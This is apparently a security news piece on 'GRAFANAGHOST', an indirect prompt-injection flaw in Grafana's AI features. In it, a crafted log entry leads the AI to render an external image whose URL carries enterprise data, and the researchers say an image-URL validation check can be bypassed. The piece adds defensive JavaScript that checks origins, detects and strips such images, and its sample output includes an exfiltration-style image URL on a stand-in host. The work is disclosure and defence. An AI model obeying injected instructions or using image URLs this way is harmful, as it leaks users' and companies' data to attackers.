GRAFANAGHOST is a vulnerability in how Grafana’s AI components process information that could allow attackers to bypass safeguards and leak enterprise data. Security researchers describe how an attacker can trigger the issue when a user interacts with a log entry, turning Grafana into an exfiltration vessel in the background with no further user interaction required.
An attacker could craft a path to external resources, and when Grafana processes the prompt, data from the enterprise environment can be exposed via the rendering of an external image, with the victim’s data sent as a URL parameter. The flaw arises because a function that validates image URLs can be bypassed, enabling exfiltration via image tags, despite protections that normally block loading images from external domains.
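The mitigation the article points to, blocking images from external domains, only holds if the check is made on the parsed origin rather than on the raw string. The following is an added example and not Grafana's own code: it resolves every image reference in model-produced markdown against the page origin, accepts only an explicit allowlist of origins, and flags or strips anything else. The origin values, the markdown sample and the function names are constructed for illustration.

```javascript
// Added example (not Grafana's code). Constructed values: the page origin and the
// allowlist of origins from which rendered images may be loaded.
const PAGE_ORIGIN = "https://grafana.example.internal";
const ALLOWED_IMAGE_ORIGINS = new Set([PAGE_ORIGIN]);

// Parse first, then compare origins. Resolving relative references against the page
// origin means "/img/x.png" and "https://grafana.example.internal/img/x.png" are
// treated identically, and the parser rather than string matching decides what the host is.
function isAllowedImageUrl(candidate, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_IMAGE_ORIGINS) {
  let parsed;
  try {
    parsed = new URL(candidate, pageOrigin);
  } catch {
    return false; // unparseable references are never rendered
  }
  // Only http(s) images are acceptable; data:, blob:, javascript: and friends are refused.
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return false;
  return allowed.has(parsed.origin);
}

// Markdown image syntax: ![alt](url "optional title"), with or without angle brackets.
const IMAGE_RE = /!\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)/g;

// Detection: list every image reference in AI-generated markdown that fails the origin check.
// Useful as a runtime monitor on model output before it reaches the renderer.
function findDisallowedImages(markdown, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_IMAGE_ORIGINS) {
  const hits = [];
  for (const m of markdown.matchAll(IMAGE_RE)) {
    if (!isAllowedImageUrl(m[1], pageOrigin, allowed)) hits.push(m[1]);
  }
  return hits;
}

// Mitigation: replace disallowed images with inert text so the browser never issues the request.
function sanitizeImages(markdown, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_IMAGE_ORIGINS) {
  return markdown.replace(IMAGE_RE, (full, url) =>
    isAllowedImageUrl(url, pageOrigin, allowed) ? full : "[image blocked: external source]"
  );
}

// Constructed sample of model output: one same-origin image, one external image carrying a
// query parameter, one data: URL.
const SAMPLE = "Summary ![logo](/img/logo.png) ![chart](https://collector.example/p.png?d=PLACEHOLDER) ![inline](data:image/png;base64,AAAA)";

console.log(findDisallowedImages(SAMPLE));
console.log(sanitizeImages(SAMPLE));
```

The scanning and stripping functions are separated on purpose: the first feeds alerting (an external image reference in AI output is a strong signal on its own), the second is the enforcement point in the render path, and both share the single origin check so a fix to the check applies to both.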
The researchers noted that the attacker could fake the path of any Grafana‑using company by guessing data structures and where prompts are stored, and that indirect prompt injections to exfiltrate data through rendered content have been discussed before in other contexts. Grafana responded to the findings and addressed the weaknesses promptly after being notified.
According to Noma Security, the broader takeaway is that AI-driven tooling requires stronger architectural controls and runtime monitoring beyond perimeter safeguards.

7 April 2026.